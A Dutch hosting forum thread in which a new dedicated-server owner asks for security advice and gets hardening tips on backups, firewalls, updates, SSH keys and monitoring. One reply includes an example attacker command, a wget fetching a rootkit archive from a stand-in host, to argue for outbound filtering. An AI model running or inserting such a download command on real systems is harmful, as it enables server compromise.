Likes: 0
08/02/06 17:54
Beste webhosters,
Binnenkort neem ik mogelijk mijn eerste dedicated server. Deze wordt door mijn host geinstalleerd (Fedora, apache, ensim enz.) en gebruiksklaar aan mij geleverd, echter is dit wél unmanaged. Ik zou graag willen weten waar ik op moet letten bij o.a. beveiliging van de server en het instellen van de server.
Alvast bedankt,
Alleznet
08/02/06 17:56
Misschien een extern bedrijf inschakelen om het beheer op zich te nemen ?
Tenminste dat heb ik ook gedaan, ja kost paar centen, maar als je gehackt word of de zaak loopt in het honderd dan ben jij en je klanten niet echt blij !
08/02/06 17:57
Ik zou beginnen met een goede backup en firewall (IPTables).
Maar zonder gekkigheid: waarom Ensim? Ik heb hier helaas teveel nare ervaringen mee gehad om je hier niet voor te waarschuwen
Waarom Fedora Core? Wij schakelen nu over naar CentOS omdat je dan minder updates te doen hebt?
Je hebt wel ervaring met Linux && Onderhoud?
08/02/06 18:06
Ik vindt Ensim erg prettig om mee te werken, heb er nog nooit problemen mee gehad, en het is hetgeen wat mijn host levert.
Fedora core was een foutje, is toch CentOs.
Betreft onderhoud is dat niet mijn zorg, de server staat wat dat betreft wel onder hun beheer.
Verder is het geen hostingbedrijf o.i.d. het is voor één website. Verder helpen de helpdeskers van het bedrijf wel gewoon altijd mee (ik zit er nu ook alleen dan virtueel), echter is het op papier voor mij.
08/02/06 18:23
Origineel geplaatst door alleznet
Ik vindt Ensim erg prettig om mee te werken, heb er nog nooit problemen mee gehad, en het is hetgeen wat mijn host levert.
Ik helaas wel. Backup gemaakt maar niet terug te zetten. Ensim support werkt NIET in het weekend, dus dat gaf een downtime van +- 48 uur.
Wat is je uiteindelijke vraag dan?Betreft onderhoud is dat niet mijn zorg, de server staat wat dat betreft wel onder hun beheer.
08/02/06 18:25
Unmanaged is meestal ook echt Unmanaged, dus zonder beveiliging en andere zaken.
08/02/06 18:29
Nou, de server wordt gewoon veilig (op het moment van oplevering) aan mij verhuurd. Dus op dat moment is alles (als het goed is) gewoon veilig. Echter hoe kan ik het veilig houden: ofwel, waar vind ik patches en nieuws over wat je moet aanpassen om het veilig te houden?
08/02/06 18:30
pcies, maar deze server valt wel onder hun beheer? :?
08/02/06 22:00
Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet.
Altijd backups maken, het liefst extern.
Een goede firewall installeren.
Je logs goed bijhouden.
Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld.
/toevoeging
En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server.
08/02/06 22:12
"Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet."
De hosting zorgt ervoor dat dit sowieso feilloos werkt.
"Altijd backups maken, het liefst extern."
Gaat zeker gebeuren, doen we nu trouwens ook al.
"Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld."
Nee, liefst ga ik nog de safemode aanzetten voor een extra vorm van veiligheid
"En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server."
testen gaat niet zomaar als je maar één dedicated huurt :P
09/02/06 18:55
Nog iemand tips?
09/02/06 18:58
Nog specifieke vragen?
09/02/06 19:25
Een oude testbak thuis wellicht ? =)Origineel geplaatst door alleznet
"Bij een verse OS installatie hoeft niet altijd de laatste updates op te zitten, vergis je hierin, niet."
De hosting zorgt ervoor dat dit sowieso feilloos werkt.
"Altijd backups maken, het liefst extern."
Gaat zeker gebeuren, doen we nu trouwens ook al.
"Verder is het allemaal vanzelfsprekend, geen crappy scripts bijvoorbeeld."
Nee, liefst ga ik nog de safemode aanzetten voor een extra vorm van veiligheid
"En natuurlijk niet zomaar alle updates of software installeren, het liefst eerst testen op een test-server."
testen gaat niet zomaar als je maar één dedicated huurt :P
10/02/06 08:17
Ben momenteel bezig op een relatief nieuwe laptop centos te installeren. Ben gewoon een hoop aan het bekijken, en de verschillen vinden tussen centos en andere linux systemen.
"Nog specifieke vragen"
Is 'nog tips' niet specifiek genoeg? :P
11/02/06 01:03
Let inderdaad op updates, zorg ervoor dat je die regelmatig uitvoert.
Eventueel iets als tripwire installeren
Zorg er voor dat alle scripts (cgi/php) draaien onder uid van de klant (suexec etc)
"ChallengeResponseAuthentication no" icm ssh keys
verifieer backups, en probeer eens een "disaster recovery" op een compleet andere machine.
onnodige processen/daemons uitzetten.
Installeer een monitoring tool. (evt ook remote) om te verifieren dat daemons werken.
Installeer sysstat (sar) en zorg dat die draait vanuit cron. (is altijd handig om terug te kijken naar sys stats)
Zorg voor een omvattende iptables firewall, een die niet alleen inkomend verkeer filterd, maar ook uitgaand. (als een cracker via exploit geen wget http://l33t.org/r00tk1t.tar kan uitvoeren is al een goede stap)
Zorg voor een noexec /tmp partitie. (discutabel, ok. Maar ik zie vaak genoeg dat het misbruikt wordt)
Iets dat vrije schijfruimte etc monitord.
Kan nog wel een tijdje doorgaan, maar er zijn veel betere en completere howto pagina's op het net.
Quote